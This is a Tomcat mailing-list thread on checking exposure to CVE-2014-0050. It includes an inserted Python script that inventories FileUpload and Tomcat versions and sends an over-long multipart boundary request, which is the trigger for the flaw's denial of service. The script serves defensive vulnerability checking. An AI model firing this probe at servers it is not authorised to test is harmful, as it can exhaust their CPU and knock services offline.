Need info on CVE-2014-0050

2014-09-28 Thread Aditi Sinha
Hi,

We are using Tomcat 7.0.40 as web server. It deploys a REST-based (Jersey)
web application where a few requests are multipart requests. These requests
accept byte array input.

We tried to reproduce this vulnerability by sending more than 4091
characters in the boundary field. The request failed with 400 status.

How can we confirm if our application is vulnerable or not to
CVE-2014-0050?

Thanks & Regards,
Aditi


RE: Need info on CVE-2014-0050

2014-09-28 Thread Caldarale, Charles R
> From: Aditi Sinha [mailto:adisinha0...@gmail.com]
> Subject: Need info on CVE-2014-0050

> We are using Tomcat 7.0.40 as web server.

> How can we confirm if our application is vulnerable or not to CVE-2014-0050?

Read the relevant security pages:
http://tomcat.apache.org/security-7.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050

Are you using Apache Commons FileUpload or a variant thereof?  If not, then 
CVE-2014-0050 doesn't apply.  If you are using FileUpload directly, rebuild 
your webapp with the newer version.  If you're using Tomcat's implementation of 
FileUpload, you should upgrade to 7.0.52 or newer.

 - Chuck




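The two checks Chuck describes (is a copy of Commons FileUpload present at all, and is it older than the fixed release) together with the over-long-boundary request Aditi tried, as an added example that is not part of this thread and not code from Tomcat or Commons FileUpload. The fixed version numbers come from the Tomcat security page and the FileUpload advisory (1.3.1; Tomcat 6.0.40, 7.0.52, 8.0.3); the host, port, path and the jar names used in testing are assumptions.

```python
"""Two checks for CVE-2014-0050 exposure: inventory the copies of Commons
FileUpload a webapp ships, and build/interpret the over-long-boundary probe.

Added example, not code from the thread or from the Tomcat project.
Host, port, path and the sample jar names are assumptions.
"""
import re
import socket
import zipfile
from pathlib import Path

# Fixed releases named in the advisories: Commons FileUpload 1.3.1, and the
# Tomcat releases that updated the bundled (package-renamed) copy.
FIXED_FILEUPLOAD = (1, 3, 1)
FIXED_TOMCAT = {6: (6, 0, 40), 7: (7, 0, 52), 8: (8, 0, 3)}


def parse_version(text):
    """'Apache Tomcat/7.0.40' -> (7, 0, 40); '1.3' -> (1, 3, 0)."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def fileupload_fixed(version):
    """True when a standalone commons-fileupload version carries the fix."""
    return parse_version(version) >= FIXED_FILEUPLOAD


def tomcat_fixed(version):
    """True/False for a branch the advisory lists, None for any other branch."""
    v = parse_version(version)
    fixed = FIXED_TOMCAT.get(v[0])
    return None if fixed is None else v >= fixed


def fileupload_jars(webinf_lib):
    """[(jar name, Implementation-Version or None)] for every jar in
    WEB-INF/lib whose name mentions fileupload. Tomcat's own copy lives in
    the server's lib/, not here, so it is covered by tomcat_fixed() instead."""
    hits = []
    for jar in sorted(Path(webinf_lib).glob("*.jar")):
        if "fileupload" not in jar.name.lower():
            continue
        with zipfile.ZipFile(jar) as z:
            try:
                manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            except KeyError:  # jar without a manifest
                manifest = ""
        m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
        hits.append((jar.name, m.group(1) if m else None))
    return hits


def build_probe(host, path, boundary_len=4096):
    """Raw HTTP/1.1 POST whose multipart boundary is boundary_len bytes long.
    4096 exceeds the 4091 the reporter tried and matches the parser's
    default buffer size."""
    boundary = "A" * boundary_len
    body = ("--" + boundary + "\r\n"
            'Content-Disposition: form-data; name="f"\r\n\r\n'
            "x\r\n"
            "--" + boundary + "--\r\n").encode()
    head = ("POST {} HTTP/1.1\r\n"
            "Host: {}\r\n"
            "Content-Type: multipart/form-data; boundary={}\r\n"
            "Content-Length: {}\r\n"
            "Connection: close\r\n\r\n").format(path, host, boundary, len(body))
    return head.encode() + body


def probe(host, port, path, timeout=10.0, boundary_len=4096):
    """Send the probe and return ('status', code) or ('timeout', None)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(host, path, boundary_len))
        try:
            first = s.recv(64)
        except socket.timeout:
            return ("timeout", None)
    m = re.match(rb"HTTP/1\.[01] (\d{3})", first)
    return ("status", int(m.group(1)) if m else None)


def interpret(outcome):
    """Turn a probe outcome into the conclusion it does and does not support.
    A timeout is an indicator, not proof: the unpatched parser spins the
    worker thread at full CPU, but a slow endpoint can also time out."""
    kind, code = outcome
    if kind == "timeout":
        return "no response before timeout: check the worker thread's CPU"
    if code == 400:
        return "400: refused; a fixed parser does this, but so does a component that never reached the parser"
    return "status %s: the endpoint did not choke; confirm which parser ran" % code
```

Run fileupload_jars() against the deployed webapp's WEB-INF/lib and tomcat_fixed() against the string printed by catalina.sh version; a hit in the webapp is checked with fileupload_fixed(), while Tomcat's own copy is only covered by the Tomcat version. The probe is the weaker of the two checks: a 400 is what Aditi saw and, as interpret() says, it does not tell you which component refused the request, so treat the version inventory as the answer and the probe as confirmation.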



Re: Need info on CVE-2014-0050

2014-09-28 Thread Aditi Sinha
Thanks Chuck. We are not using Apache Commons FileUpload or Tomcat's
implementation of FileUpload.